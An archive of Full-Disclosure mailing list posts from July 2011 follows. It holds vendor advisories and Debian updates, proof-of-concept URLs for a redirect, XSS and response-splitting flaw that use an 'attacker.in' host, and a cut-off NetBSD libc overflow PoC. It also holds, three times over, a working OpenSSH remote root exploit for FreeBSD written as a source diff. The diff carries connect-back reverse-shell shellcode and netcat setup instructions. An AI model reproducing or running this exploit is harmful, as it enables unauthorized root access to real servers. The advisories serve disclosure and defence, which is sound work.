Re: [Full-disclosure] OpenSSH 3.5p1 Remote Root Exploit for FreeBSD
This seems to be in libopie rather than sshd or libpam and happens when the username is longer than OPIE_PRINCIPAL_MAX. I'm not sure exactly where inside libopie it is, but commenting out pam_opie.so seems to prevent it. http://www.freebsd.org/cgi/cvsweb.cgi/src/lib/libpam/modules/pam_opie/pam_opie.c?annotate=1.26 prevents usernames longer than OPIE_PRINCIPAL_MAX from being accepted by pam_opie. -- Darren Tucker (dtucker at zip.com.au) GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 Good judgement comes with experience. Unfortunately, the experience usually comes from bad judgement. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Spanish] Curso gratuito: Linux exploit development - ASCII Armor Bypass Return-To-PLT
+1 Iría pero soy de México y se me dificulta ir a argentina por una platica, pero seria excelente que la grabaran y compartieran. On 29/06/11 12:38, Jonas Andradas wrote: 2011/6/29 runlvl run...@gmail.com mailto:run...@gmail.com Este sábado 2 de Julio a las 11:00hs se dictara en Castro Barros 183 1-5 ( Argentina ) el curso de 3 horas gratuito sobre seguridad informática. El sábado me resultará imposible asistir. ¿Se va a grabar el curso para poder descargarlo posteriormente? ¿Se va colgar el material en algún sitio? Un saludo, -- Jonás Andradas Skype: jontux LinkedIn: http://www.linkedin.com/in/andradas GPG Fingerprint: 678F 7BD0 83C3 28CE 9E8F 3F7F 4D87 9996 E0C6 9372 Keyservers: pgp.mit.edu http://pgp.mit.edu | pgp.rediris.es http://pgp.rediris.es ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ attachment: pavel_carrilloj.vcf___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SEC Consult SA-20110701-0 :: Multiple SQL injection vulnerabilities in WordPress
SEC Consult Vulnerability Lab Security Advisory 20110701-0 === title: Multiple SQL Injection Vulnerabilities product: WordPress vulnerable version: 3.1.3/3.2-RC1 and probably earlier versions fixed version: 3.1.4/3.2-RC3 impact: Medium homepage: http://wordpress.org/ found: 2011-06-21 by: K. Gudinavicius SEC Consult Vulnerability Lab https://www.sec-consult.com === Vendor description: --- WordPress was born out of a desire for an elegant, well-architectured personal publishing system built on PHP and MySQL and licensed under the GPLv2 (or later). It is the official successor of b2/cafelog. WordPress is fresh software, but its roots and development go back to 2001. Source: http://wordpress.org/about/ Vulnerability overview/description: --- Due to insufficient input validation in certain functions of WordPress it is possible for a user with the Editor role to inject arbitrary SQL commands. By exploiting this vulnerability, an attacker gains access to all records stored in the database with the privileges of the WordPress database user. Proof of concept: - 1) The get_terms() filter declared in the wp-includes/taxonomy.php file does not properly validate user input, allowing an attacker with Editor privileges to inject arbitrary SQL commands in the orderby and order parameters passed as array members to the vulnerable filter when sorting for example link categories. The following URLs could be used to perform blind SQL injection attacks: http://localhost/wp-admin/edit-tags.php?taxonomy=link_categoryorderby=[SQL injection]order=[SQL injection] http://localhost/wp-admin/edit-tags.php?taxonomy=post_tagorderby=[SQL injection]order=[SQL injection] http://localhost/wp-admin/edit-tags.php?taxonomy=categoryorderby=[SQL injection]order=[SQL injection] 2) The get_bookmarks() function declared in the wp-includes/bookmark.php file does not properly validate user input, allowing an attacker with Editor privileges to inject arbitrary SQL commands in the orderby and order parameters passed as array members to the vulnerable function when sorting links. The following URL could be used to perform blind SQL injection attacks: http://localhost/wp-admin/link-manager.php?orderby=[SQL injection]order=[SQL injection] Vulnerable / tested versions: - The vulnerability has been verified to exist in version 3.1.3 of WordPress, which is the most recent version at the time of discovery. Vendor contact timeline: 2011-06-22: Contacting vendor through secur...@wordpress.org 2011-06-22: Vendor reply, sending advisory draft 2011-06-23: Vendor confirms security issue 2011-06-30: Vendor releases patched version 2011-07-01: SEC Consult publishes advisory Solution: - Upgrade to version 3.1.4 or 3.2-RC3 Workaround: --- A more restrictive role, e.g. Author, could be applied to the user. Advisory URL: - https://www.sec-consult.com/en/advisories.html ~~~ SEC Consult Unternehmensberatung GmbH Office Vienna Mooslackengasse 17 A-1190 Vienna Austria Tel.: +43 / 1 / 890 30 43 - 0 Fax.: +43 / 1 / 890 30 43 - 25 Mail: research at sec-consult dot com https://www.sec-consult.com EOF K. Gudinavicius / @2011 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Vulnerabilities in developer.apple.com
Vulnerabilities via URL Redirector in developer.apple.com 1. VULNERABILITY DESCRIPTION Arbitrary URL Redirect == POC (Browsers: All) https://developer.apple.com/membercenter/urlRedirect.action?fullURL=http://attacker.in/malware_exists_in_this_page Issue References: OWASP Top 10 A10 - https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project CWE 601 - http://cwe.mitre.org/data/definitions/601.html Cross Site Scripting(XSS) Via Arbitrary URL Redirect POC (Browsers: Safari, Opera): https://developer.apple.com/membercenter/urlRedirect.action?fullURL=data%3Atext%2Fhtml%3Bbase64%2CPHNjcmlwdD5hbGVydCgiQ3Jvc3MgU2l0ZSBTY3JpcHRpbmcgRGVtbyBieVxuXG55ZWhnLm5ldFxuIik8L3NjcmlwdD4%3D Issue References: OWASP Top 10 A2 - https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project CWE 79 - http://cwe.mitre.org/data/definitions/79.html HTTP Response Splitting(HRS) Via Arbitrary URL Redirect https://developer.apple.com/membercenter/urlRedirect.action?fullURL=http://attacker.in%0D%0ALocation%3A%0D%0AContent-Type%3A%20text%2Fhtml%0D%0AContent-Length%3A%2089%0D%0A%0D%0A%3Chtml%3E%3Ctitle%3EThis%20page%20was%20hacked%3F%3C%2Ftitle%3E%3Ch1%3EThis%20page%20was%20hacked%3F%20-%20Not%20Really%3C%2Fh1%3E%3C!-- Issue References: CWE 113 - http://cwe.mitre.org/data/definitions/113.html Demo: http://yehg.net/lab/pr0js/training/view/misc/Vulnerabilities%20Via%20Redirectors%20-%20developer.apple.com/ 2. VENDOR Apple Inc http://www.apple.com 3. VULNERABILITY STATUS FIXED 4. DISCLOSURE TIME-LINE 2011-04-25: reported vendor 2011-04-27: vendor replied Thank you for forwarding this issue to us. We take any report of a potential security issue very seriously. 2011-06-29: vendor replied vulnerability was fixed 2011-07-01: vulnerability was disclosed 5. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/sites/developer.apple.com/[apple-developer]_ur_xss_hrs #yehg [2011-07-01] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] NetBSD 5.1 libc/net multiple functions stack buffer overflow
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[ NetBSD 5.1 libc/net multiple functions stack buffer overflow ]
Author: Maksymilian Arciemowicz
http://netbsd.org/donations/
Date:
- - Dis.: 01.04.2011
- - Pub.: 01.07.2011
CVE: CVE-2011-1656
CWE: CWE-121
Affected software:
- - NetBSD 5.1 (fixed)
Affected functions:
- - getservbyname(3)
- - getservbyname_r(3)
- - getservbyport(3)
- - getservbyport_r(3)
- - getaddrinfo(3)
- - getnameinfo(3)
Original URL:
http://securityreason.com/achievement_securityalert/99
- --- 0.Description ---
The getservbyname(), and getservbyport() functions each return a pointer
to an object with the following structure containing the broken-out
fields of a line in the network services data base,
struct servent *
getservbyname(const char *name, const char *proto);
struct servent *
getservbyport(int port, const char *proto);
The getservbyname() and getservbyport() functions sequentially search
from the beginning of the file until a matching protocol name or port
number is found, or until EOF is encountered. If a protocol name is
also supplied (non-NULL), searches must also match the protocol.
- --- 1. NetBSD 5.1 libc/net multiple functions stack buffer overflow ---
The main problem exists in files like getservbyname_r.c and
getservbyport_r.c. Functions getservbyname*(3), getservbyport*(3) and
getaddrinfo(3) of NetBSD libc implementation, provides to possible
buffer overflow. To demonstrate this issue, we may use PHP as an attack
vector.
127# php -r 'getservbyname(A,str_repeat(A,7108));'
127# php -r 'getservbyname(A,str_repeat(A,7109));'
Memory fault (core dumped)
- -php-5.3.6/ext/standard/basic_functions.c---
PHP_FUNCTION(getservbyname)
{
char *name, *proto;
int name_len, proto_len;
struct servent *serv;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, ss, name,
name_len, proto, proto_len) == FAILURE) {
return;
}
...
serv = getservbyname(name, proto); CALL TO LIBC
- -php-5.3.6/ext/standard/basic_functions.c---
BT:
#0 0xbb8b2d65 in __log2 () from /usr/lib/libc.so.12
#1 0xbb8afa2e in __call_hash () from /usr/lib/libc.so.12
#2 0xbb8b0ebd in __hash_open () from /usr/lib/libc.so.12
#3 0xbb8884c2 in getservbyname_r () from /usr/lib/libc.so.12
#4 0xbb822f6f in getservbyname () from /usr/lib/libc.so.12
#5 0x08334458 in php_get_highlight_struct ()
Let's see what is wrong with getservbyname().
- -getservbyname.c---
struct servent *
getservbyname(const char *name, const char *proto)
{
struct servent *s;
mutex_lock(_servent_mutex);
s = getservbyname_r(name, proto, _servent_data.serv, _servent_data);
=== REFERENCE
mutex_unlock(_servent_mutex);
return (s);
}
- -getservbyname.c---
as we can see, getservbyname(3) redirect to getservbyname_r(3) function.
- -getservbyname_r.c---
if (sd-flags _SV_DB) {
char buf[BUFSIZ];
DBT key, data;
DB *db = sd-db;
key.data = buf;
if (proto == NULL)
key.size = snprintf(buf, sizeof(buf), \376%s, name);
= INVALID
key.size HERE
else
key.size = snprintf(buf, sizeof(buf), \376%s/%s,
= INVALID
key.size HERE
name, proto);
key.size++;
if ((*db-get)(db, key, data, 0) != 0)
return NULL;
if ((*db-get)(db, data, key, 0) != 0)
return NULL;
- -getservbyname_r.c---
key.size may be bigger as BUFSIZ.
snprintf(3) return number of characters that would have been written had
size been sufficiently large (not counting the terminating null). In
this case, snprintf(3) return bigger value as sizeof(buf). In older libc
implementations, snprintf(3) should return -1, if the string is truncated.
The same problem is with getservbyport_r(3).
- -getservbyname_r.c---
if (sd-flags _SV_DB) {
char buf[BUFSIZ];
DBT key, data;
DB *db = sd-db;
key.data = buf;
port = htons(port);
if (proto == NULL)
key.size = snprintf(buf, sizeof(buf), \377%d, port);
= INVALID
key.size HERE
else
key.size = snprintf(buf, sizeof(buf), \377%d/%s,
port, =
INVALID key.size HERE
proto);
key.size++;
if ((*db-get)(db, key, data, 0) != 0)
return NULL;
if ((*db-get)(db, data, key, 0) != 0)
return NULL;
- -getservbyname_r.c---
And the last PoC:
- -PoC---
/*
127# gcc -o grr grr.c ./grr 6050
127# gcc -o grr grr.c ./grr 6051
Memory fault (core dumped)
127#
*/
#include stdlib.h
#include string.h
#include
Re: [Full-disclosure] S3cC0n Security Conference
S3cC0n Security Conference Schedule http://dl.dropbox.com/u/18007092/S3cC0n_Schedule.pdf On Wed, Jun 29, 2011 at 3:17 PM, secc0n Conference s3c...@gmail.com wrote: Dear Security researchers, S3cC0n, A Indian internet security researcher team invites you to join us on 7th, 8th, and 9th of July for the annual discloser of exploits and security researches. Last 2 year we are organizing this conference with 56 researchers. S3cC0n is proud to announce the launch of it security and hacking conference at INDIA. This conference will bring together security researchers , security professionals , vendors , Law enforcements agencies from all over the country to a common platform to discuss latest research in field of information security and in particular the major security threats faced by everyone today . S3cC0n is one of a kind of conference showcasing the latest research and trends in information security by renowned security researchers/professionals. Following topics are covered Web application – Security is not separate Cross interface attack (CIA) Web Trend – Exploited browser SQLXSS (SQL Injections XSS) Remote Code execution in Dev Document rendering attack XML authoring flow WAF Bypass Methods Web Widget interface flaw Persistent Redirection flaw Declarative security Content Delivery networks – Stringency Many More Private 0days will be disclosed in conference... Topic information with schedule of discussion topic and author name will display soon. For More details please shout mail [AT] s3c...@gmail.com Best Regards, S3cC0n Team Download PDF : http://dl.dropbox.com/u/18007092/Dear_Security_researchers.pdf ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Working Remote Root Exploit for OpenSSH 3.4p1 (FreeBSD)
OpenSSH FreeBSD Remote Root Exploit By Kingcope Year 2011 Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702 Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924 run like ./ssh -1 -z yourip target setup a netcat, port 443 on yourip first a statically linked linux binary of the exploit can be found below attached is a diff to openssh-5.8p2. the statically linked binary can be downloaded from http://isowarez.de/ssh_0day I know these versions are really old, some seem to run that tough. -Cheers, King the archaeologist Cope diff openssh-5.8p2/ssh.c openssh-5.8p2_2/ssh.c 149a150 char *myip; 195a197,203 OpenSSH FreeBSD Remote Root Exploit\n By Kingcope\n Year 2011\n\n Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702\n Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924\n run like ./ssh -1 -z yourip target\n setup a netcat, port 443 on yourip first\n\n 299c307 while ((opt = getopt(ac, av, 1246ab:c:e:fgi:kl:m:no:p:qstvx --- while ((opt = getopt(ac, av, 1246ab:c:e:fgi:kl:m:no:z:p:qstvx 335a344,346 break; case 'z': myip = optarg; diff openssh-5.8p2/sshconnect1.c openssh-5.8p2_2/sshconnect1.c 667a668,719 //IP=\xc0\xa8\x20\x80 #define IPADDR \xc0\xa8\x20\x80 #define PORT \x27\x10 /* htons(1) */ char sc[] = \x90\x90 \x90\x90 \x31\xc9 // xorecx, ecx \xf7\xe1 // mulecx \x51 // push ecx \x41 // incecx \x51 // push ecx \x41 // incecx \x51 // push ecx \x51 // push ecx \xb0\x61 // moval, 97 \xcd\x80 // int80h \x89\xc3 // movebx, eax \x68IPADDR // push dword 0101017fh \x66\x68PORT // push word 4135 \x66\x51 // push cx \x89\xe6 // movesi, esp \xb2\x10 // movdl, 16 \x52 // push edx \x56 // push esi \x50 // push eax \x50 // push eax \xb0\x62 // moval, 98 \xcd\x80 // int80h \x41 // incecx \xb0\x5a // moval, 90 \x49 // dececx \x51 // push ecx \x53 // push ebx \x53 // push ebx \xcd\x80 // int80h \x41 // incecx \xe2\xf5 // loop -10 \x51 // push ecx \x68\x2f\x2f\x73\x68 // push dword 68732f2fh \x68\x2f\x62\x69\x6e // push dword 6e69622fh \x89\xe3 // movebx, esp \x51 // push ecx \x54 // push esp \x53 // push ebx \x53 // push ebx \xb0\xc4\x34\xff \xcd\x80;// int80h extern char *myip; 678a731,748 char buffer[10]; printf(OpenSSH Remote Root Exploit\n); printf(By Kingcope\n); printf(Year 2011\n\n); printf(Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702\n); printf(Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924\n); printf(Connect back to: %s:443\n, myip); *((unsigned long*)(sc + 21)) = inet_addr(myip); *((unsigned short*)(sc + 27)) = htons(443); memset(buffer, 'V', 8096); memcpy(buffer+24, \x6b\x4b\x0c\x08, 4); // SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702 memset(buffer+28, '\x90', 65535); memcpy(buffer+28+65535, sc, sizeof(sc)); server_user=buffer; ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Working Remote Root Exploit for OpenSSH 3.4p1 (FreeBSD)
you can apply the patch using the diff if you don't want to run that. 2011/7/1 Benji m...@b3nji.com: So you want people to download your statically linked binary? On Fri, Jul 1, 2011 at 4:45 PM, HI-TECH . isowarez.isowarez.isowa...@googlemail.com wrote: OpenSSH FreeBSD Remote Root Exploit By Kingcope Year 2011 Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702 Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924 run like ./ssh -1 -z yourip target setup a netcat, port 443 on yourip first a statically linked linux binary of the exploit can be found below attached is a diff to openssh-5.8p2. the statically linked binary can be downloaded from http://isowarez.de/ssh_0day I know these versions are really old, some seem to run that tough. -Cheers, King the archaeologist Cope diff openssh-5.8p2/ssh.c openssh-5.8p2_2/ssh.c 149a150 char *myip; 195a197,203 OpenSSH FreeBSD Remote Root Exploit\n By Kingcope\n Year 2011\n\n Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702\n Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924\n run like ./ssh -1 -z yourip target\n setup a netcat, port 443 on yourip first\n\n 299c307 while ((opt = getopt(ac, av, 1246ab:c:e:fgi:kl:m:no:p:qstvx --- while ((opt = getopt(ac, av, 1246ab:c:e:fgi:kl:m:no:z:p:qstvx 335a344,346 break; case 'z': myip = optarg; diff openssh-5.8p2/sshconnect1.c openssh-5.8p2_2/sshconnect1.c 667a668,719 //IP=\xc0\xa8\x20\x80 #define IPADDR \xc0\xa8\x20\x80 #define PORT \x27\x10 /* htons(1) */ char sc[] = \x90\x90 \x90\x90 \x31\xc9 // xor ecx, ecx \xf7\xe1 // mul ecx \x51 // push ecx \x41 // inc ecx \x51 // push ecx \x41 // inc ecx \x51 // push ecx \x51 // push ecx \xb0\x61 // mov al, 97 \xcd\x80 // int 80h \x89\xc3 // mov ebx, eax \x68IPADDR // push dword 0101017fh \x66\x68PORT // push word 4135 \x66\x51 // push cx \x89\xe6 // mov esi, esp \xb2\x10 // mov dl, 16 \x52 // push edx \x56 // push esi \x50 // push eax \x50 // push eax \xb0\x62 // mov al, 98 \xcd\x80 // int 80h \x41 // inc ecx \xb0\x5a // mov al, 90 \x49 // dec ecx \x51 // push ecx \x53 // push ebx \x53 // push ebx \xcd\x80 // int 80h \x41 // inc ecx \xe2\xf5 // loop -10 \x51 // push ecx \x68\x2f\x2f\x73\x68 // push dword 68732f2fh \x68\x2f\x62\x69\x6e // push dword 6e69622fh \x89\xe3 // mov ebx, esp \x51 // push ecx \x54 // push esp \x53 // push ebx \x53 // push ebx \xb0\xc4\x34\xff \xcd\x80; // int 80h extern char *myip; 678a731,748 char buffer[10]; printf(OpenSSH Remote Root Exploit\n); printf(By Kingcope\n); printf(Year 2011\n\n); printf(Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702\n); printf(Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924\n); printf(Connect back to: %s:443\n, myip); *((unsigned long*)(sc + 21)) = inet_addr(myip); *((unsigned short*)(sc + 27)) = htons(443); memset(buffer, 'V', 8096); memcpy(buffer+24, \x6b\x4b\x0c\x08, 4); // SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702 memset(buffer+28, '\x90', 65535); memcpy(buffer+28+65535, sc, sizeof(sc)); server_user=buffer; ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Working Remote Root Exploit for OpenSSH 3.4p1 (FreeBSD)
So you want people to download your statically linked binary? On Fri, Jul 1, 2011 at 4:45 PM, HI-TECH . isowarez.isowarez.isowa...@googlemail.com wrote: OpenSSH FreeBSD Remote Root Exploit By Kingcope Year 2011 Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702 Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924 run like ./ssh -1 -z yourip target setup a netcat, port 443 on yourip first a statically linked linux binary of the exploit can be found below attached is a diff to openssh-5.8p2. the statically linked binary can be downloaded from http://isowarez.de/ssh_0day I know these versions are really old, some seem to run that tough. -Cheers, King the archaeologist Cope diff openssh-5.8p2/ssh.c openssh-5.8p2_2/ssh.c 149a150 char *myip; 195a197,203 OpenSSH FreeBSD Remote Root Exploit\n By Kingcope\n Year 2011\n\n Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702\n Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924\n run like ./ssh -1 -z yourip target\n setup a netcat, port 443 on yourip first\n\n 299c307 while ((opt = getopt(ac, av, 1246ab:c:e:fgi:kl:m:no:p:qstvx --- while ((opt = getopt(ac, av, 1246ab:c:e:fgi:kl:m:no:z:p:qstvx 335a344,346 break; case 'z': myip = optarg; diff openssh-5.8p2/sshconnect1.c openssh-5.8p2_2/sshconnect1.c 667a668,719 //IP=\xc0\xa8\x20\x80 #define IPADDR \xc0\xa8\x20\x80 #define PORT \x27\x10 /* htons(1) */ char sc[] = \x90\x90 \x90\x90 \x31\xc9 // xorecx, ecx \xf7\xe1 // mulecx \x51 // push ecx \x41 // incecx \x51 // push ecx \x41 // incecx \x51 // push ecx \x51 // push ecx \xb0\x61 // moval, 97 \xcd\x80 // int80h \x89\xc3 // movebx, eax \x68IPADDR // push dword 0101017fh \x66\x68PORT // push word 4135 \x66\x51 // push cx \x89\xe6 // movesi, esp \xb2\x10 // movdl, 16 \x52 // push edx \x56 // push esi \x50 // push eax \x50 // push eax \xb0\x62 // moval, 98 \xcd\x80 // int80h \x41 // incecx \xb0\x5a // moval, 90 \x49 // dececx \x51 // push ecx \x53 // push ebx \x53 // push ebx \xcd\x80 // int80h \x41 // incecx \xe2\xf5 // loop -10 \x51 // push ecx \x68\x2f\x2f\x73\x68 // push dword 68732f2fh \x68\x2f\x62\x69\x6e // push dword 6e69622fh \x89\xe3 // movebx, esp \x51 // push ecx \x54 // push esp \x53 // push ebx \x53 // push ebx \xb0\xc4\x34\xff \xcd\x80;// int80h extern char *myip; 678a731,748 char buffer[10]; printf(OpenSSH Remote Root Exploit\n); printf(By Kingcope\n); printf(Year 2011\n\n); printf(Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702\n); printf(Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924\n); printf(Connect back to: %s:443\n, myip); *((unsigned long*)(sc + 21)) = inet_addr(myip); *((unsigned short*)(sc + 27)) = htons(443); memset(buffer, 'V', 8096); memcpy(buffer+24, \x6b\x4b\x0c\x08, 4); // SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702 memset(buffer+28, '\x90', 65535); memcpy(buffer+28+65535, sc, sizeof(sc)); server_user=buffer; ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-11-232: HP iNode Management Center iNodeMngChecker.exe Remote Code Execution Vulnerability
ZDI-11-232: HP iNode Management Center iNodeMngChecker.exe Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-11-232 July 1, 2011 -- CVE ID: CVE-2011-1867 -- CVSS: 10, (AV:N/AC:L/Au:N/C:C/I:C/A:C) -- Affected Vendors: Hewlett-Packard -- Affected Products: Hewlett-Packard iNode Management Center -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 11239. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of HP H3C/3Com iNode Management Center. Authentication is not required to exploit this vulnerability. The flaw exists within the iNOdeMngChecker.exe component which listens by default on TCP port 9090. When handling the 0x0A0BF007 packet type the process blindly copies user supplied data into a fixed-length buffer on the stack. A remote attacker can exploit this vulnerability to execute arbitrary code under the context of the SYSTEM user. -- Vendor Response: Hewlett-Packard has issued an update to correct this vulnerability. More details can be found at: http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02901775 -- Disclosure Timeline: 2011-01-21 - Vulnerability reported to vendor 2011-07-01 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Luigi Auriemma -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 2267-1] perl security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2267-1 secur...@debian.org http://www.debian.org/security/Moritz Muehlenhoff July 01, 2011 http://www.debian.org/security/faq - - Package: perl Vulnerability : restriction bypass Problem type : local Debian-specific: no CVE ID : CVE-2010-1447 Debian Bug : 631529 It was discovered that Perl's Safe module - a module to compile and execute code in restricted compartments - could by bypassed. Please note that this update is known to break Petal, an XML-based templating engine (shipped with Debian 6.0/Squeeze in the package libpetal-perl, see http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=582805 for details). A fix is not yet available. If you use Petal, you might consider to put the previous Perl packages on hold. For the oldstable distribution (lenny), this problem has been fixed in version 5.10.0-19lenny5. For the stable distribution (squeeze), this problem has been fixed in version 5.10.1-17squeeze2. For the unstable distribution (sid), this problem has been fixed in version 5.12.3-1. We recommend that you upgrade your perl packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iEYEARECAAYFAk4OCOMACgkQXm3vHE4uylpFjwCgxNO0AgBmr0EM17E3rbK4Yxfo 2/gAoIuX2QExRCbSywe476I8kyKsojEq =Lcl2 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 2268-1] iceweasel security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2268-1 secur...@debian.org http://www.debian.org/security/Moritz Muehlenhoff July 01, 2011 http://www.debian.org/security/faq - - Package: iceweasel Vulnerability : several Problem type : remote Debian-specific: no CVE ID : CVE-2011-0083 CVE-2011-0085 CVE-2011-2362 CVE-2011-2363 CVE-2011-2365 CVE-2011-2371 CVE-2011-2373 CVE-2011-2374 CVE-2011-2376 Several vulnerabilities have been found in Iceweasel, a web browser based on Firefox: CVE-2011-0083 / CVE-2011-2363 regenrecht discovered two use-after-frees in SVG processing, which could lead to the execution of arbitrary code. CVE-2011-0085 regenrecht discovered a use-after-free in XUL processing, which could lead to the execution of arbitrary code. CVE-2011-2362 David Chan discovered that cookies were insufficiently isolated. CVE-2011-2371 Chris Rohlf and Yan Ivnitskiy discovered an integer overflow in the Javascript engine, which could lead to the execution of arbitrary code. CVE-2011-2373 Martin Barbella discovered a use-after-free in XUL processing, which could lead to the execution of arbitrary code. CVE-2011-2374 Bob Clary, Kevin Brosnan, Nils, Gary Kwong, Jesse Ruderman and Christian Biesinger discovered memory corruption bugs, which may lead to the execution of arbitrary code. CVE-2011-2376 Luke Wagner and Gary Kwong discovered memory corruption bugs, which may lead to the execution of arbitrary code. For the oldstable distribution (lenny), this problem has been fixed in version 1.9.0.19-12 of the xulrunner source package. For the stable distribution (squeeze), this problem has been fixed in version 3.5.16-9. For the unstable distribution (sid), this problem has been fixed in version 3.5.19-3 For the experimental distribution, this problem has been fixed in version 5.0-1. We recommend that you upgrade your iceweasel packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iEYEARECAAYFAk4OH94ACgkQXm3vHE4uylrFIwCgifRZEbeEqtJZ2dQ5B0CGpgsa Y2sAn0PRhH2ZQsACdmA/GEI3qyeeWQXH =LaSN -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 2262-2] php5 update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2266-2 secur...@debian.org http://www.debian.org/security/Moritz Muehlenhoff July 01, 2011 http://www.debian.org/security/faq - - Package: php5 Vulnerability : several Problem type : remote Debian-specific: no CVE ID : CVE-2010-2531 CVE-2011-0420 CVE-2011-0421 CVE-2011-0708 CVE-2011-1153 CVE-2011-1466 CVE-2011-1471 CVE-2011-2202 The update for CVE-2010-2531 for the old stabledistribution (lenny) introduced a regression, which lead to additional output being written to stdout. For the oldstable distribution (lenny), this problem has been fixed in version 5.2.6.dfsg.1-1+lenny13. We recommend that you upgrade your php5 packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) 